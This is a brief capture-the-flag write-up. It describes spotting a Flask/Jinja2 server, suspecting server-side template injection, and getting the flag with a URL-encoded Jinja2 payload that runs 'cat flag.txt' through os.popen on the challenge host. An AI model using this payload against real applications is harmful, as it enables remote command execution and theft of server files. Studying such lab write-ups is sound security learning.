First of all start the instance
On visiting the host we see flask/jinja2.
So I searched for the exploit .
Checking for SSTI
Got an article about SSTI
https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/
http://165.22.124.155:31361/%7B%7Brequest.application.globals.builtins.import('os').popen('cat%20flag.txt').read()%7D%7D
And we got the flag successfully..